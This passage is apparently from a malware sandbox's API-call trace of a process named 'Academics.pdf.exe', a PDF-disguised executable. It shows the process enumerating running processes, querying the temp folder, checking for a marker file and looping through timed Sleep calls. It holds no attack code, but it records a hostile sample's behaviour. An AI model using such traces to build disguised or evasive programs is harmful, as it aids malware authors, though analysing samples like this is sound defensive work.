hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0317.256] CloseHandle (hObject=0x294) returned 1 [0317.256] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.256] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.256] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0317.258] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0317.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0317.260] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.261] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0317.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0317.263] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0317.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0317.265] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0317.265] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.266] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.267] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.268] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0317.270] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.271] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.272] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0317.272] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0317.283] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.284] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.284] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.284] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0317.284] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0317.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0317.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0317.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0317.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0317.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0317.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0317.285] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0317.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0317.286] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0317.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0317.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0317.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0317.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0317.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0317.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0317.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0317.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0317.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0317.286] timeGetTime () returned 0x4f2d5 [0317.286] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.286] Sleep (dwMilliseconds=0xa) [0317.289] timeGetTime () returned 0x4f2e5 [0317.289] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.289] Sleep (dwMilliseconds=0xa) [0317.305] timeGetTime () returned 0x4f2f4 [0317.306] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.306] Sleep (dwMilliseconds=0xa) [0317.320] timeGetTime () returned 0x4f304 [0317.321] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.321] Sleep (dwMilliseconds=0xa) [0317.335] timeGetTime () returned 0x4f313 [0317.336] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.336] Sleep (dwMilliseconds=0xa) [0317.351] timeGetTime () returned 0x4f323 [0317.351] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.351] Sleep (dwMilliseconds=0xa) [0317.367] timeGetTime () returned 0x4f333 [0317.367] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.367] Sleep (dwMilliseconds=0xa) [0317.382] timeGetTime () returned 0x4f342 [0317.382] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.382] Sleep (dwMilliseconds=0xa) [0317.398] timeGetTime () returned 0x4f352 [0317.398] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.398] Sleep (dwMilliseconds=0xa) [0317.413] timeGetTime () returned 0x4f361 [0317.414] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.414] Sleep (dwMilliseconds=0xa) [0317.429] timeGetTime () returned 0x4f371 [0317.429] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.429] Sleep (dwMilliseconds=0xa) [0317.445] timeGetTime () returned 0x4f381 [0317.445] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.445] Sleep (dwMilliseconds=0xa) [0317.460] timeGetTime () returned 0x4f390 [0317.461] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.461] Sleep (dwMilliseconds=0xa) [0317.476] timeGetTime () returned 0x4f3a0 [0317.476] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.476] Sleep (dwMilliseconds=0xa) [0317.492] timeGetTime () returned 0x4f3af [0317.492] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.492] Sleep (dwMilliseconds=0xa) [0317.507] timeGetTime () returned 0x4f3bf [0317.507] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.507] Sleep (dwMilliseconds=0xa) [0317.523] timeGetTime () returned 0x4f3cf [0317.523] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.523] Sleep (dwMilliseconds=0xa) [0317.538] timeGetTime () returned 0x4f3de [0317.538] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.538] Sleep (dwMilliseconds=0xa) [0317.556] timeGetTime () returned 0x4f3ee [0317.556] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.556] Sleep (dwMilliseconds=0xa) [0317.570] timeGetTime () returned 0x4f3fd [0317.570] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.570] Sleep (dwMilliseconds=0xa) [0317.585] timeGetTime () returned 0x4f40d [0317.585] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.585] Sleep (dwMilliseconds=0xa) [0317.601] timeGetTime () returned 0x4f41d [0317.601] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.601] Sleep (dwMilliseconds=0xa) [0317.616] timeGetTime () returned 0x4f42c [0317.616] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0317.616] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0317.617] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0317.617] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0317.617] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0317.617] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.617] Sleep (dwMilliseconds=0xa) [0317.632] timeGetTime () returned 0x4f43c [0317.632] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.632] Sleep (dwMilliseconds=0xa) [0317.648] timeGetTime () returned 0x4f44b [0317.648] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.648] Sleep (dwMilliseconds=0xa) [0317.663] timeGetTime () returned 0x4f45b [0317.663] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.663] Sleep (dwMilliseconds=0xa) [0317.679] timeGetTime () returned 0x4f46b [0317.679] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.679] Sleep (dwMilliseconds=0xa) [0317.697] timeGetTime () returned 0x4f47a [0317.697] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.697] Sleep (dwMilliseconds=0xa) [0317.710] timeGetTime () returned 0x4f48a [0317.710] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.710] Sleep (dwMilliseconds=0xa) [0317.726] timeGetTime () returned 0x4f499 [0317.726] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.726] Sleep (dwMilliseconds=0xa) [0317.741] timeGetTime () returned 0x4f4a9 [0317.741] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.741] Sleep (dwMilliseconds=0xa) [0317.757] timeGetTime () returned 0x4f4b9 [0317.757] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.757] Sleep (dwMilliseconds=0xa) [0317.772] timeGetTime () returned 0x4f4c8 [0317.772] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.772] Sleep (dwMilliseconds=0xa) [0317.788] timeGetTime () returned 0x4f4d8 [0317.788] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.788] Sleep (dwMilliseconds=0xa) [0317.812] timeGetTime () returned 0x4f4e7 [0317.812] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.812] Sleep (dwMilliseconds=0xa) [0317.819] timeGetTime () returned 0x4f4f7 [0317.819] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.819] Sleep (dwMilliseconds=0xa) [0317.835] timeGetTime () returned 0x4f507 [0317.835] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.835] Sleep (dwMilliseconds=0xa) [0317.850] timeGetTime () returned 0x4f516 [0317.850] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.850] Sleep (dwMilliseconds=0xa) [0317.866] timeGetTime () returned 0x4f526 [0317.866] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.866] Sleep (dwMilliseconds=0xa) [0317.883] timeGetTime () returned 0x4f535 [0317.883] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.883] Sleep (dwMilliseconds=0xa) [0317.897] timeGetTime () returned 0x4f545 [0317.897] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.897] Sleep (dwMilliseconds=0xa) [0317.913] timeGetTime () returned 0x4f555 [0317.913] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.913] Sleep (dwMilliseconds=0xa) [0317.928] timeGetTime () returned 0x4f564 [0317.928] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.929] Sleep (dwMilliseconds=0xa) [0317.944] timeGetTime () returned 0x4f574 [0317.945] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.945] Sleep (dwMilliseconds=0xa) [0317.964] timeGetTime () returned 0x4f583 [0317.964] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.964] Sleep (dwMilliseconds=0xa) [0317.975] timeGetTime () returned 0x4f593 [0317.975] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.975] Sleep (dwMilliseconds=0xa) [0317.991] timeGetTime () returned 0x4f5a3 [0317.991] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0317.991] Sleep (dwMilliseconds=0xa) [0318.006] timeGetTime () returned 0x4f5b2 [0318.007] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.007] Sleep (dwMilliseconds=0xa) [0318.022] timeGetTime () returned 0x4f5c2 [0318.022] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.022] Sleep (dwMilliseconds=0xa) [0318.038] timeGetTime () returned 0x4f5d1 [0318.038] PeekMessageW (in: 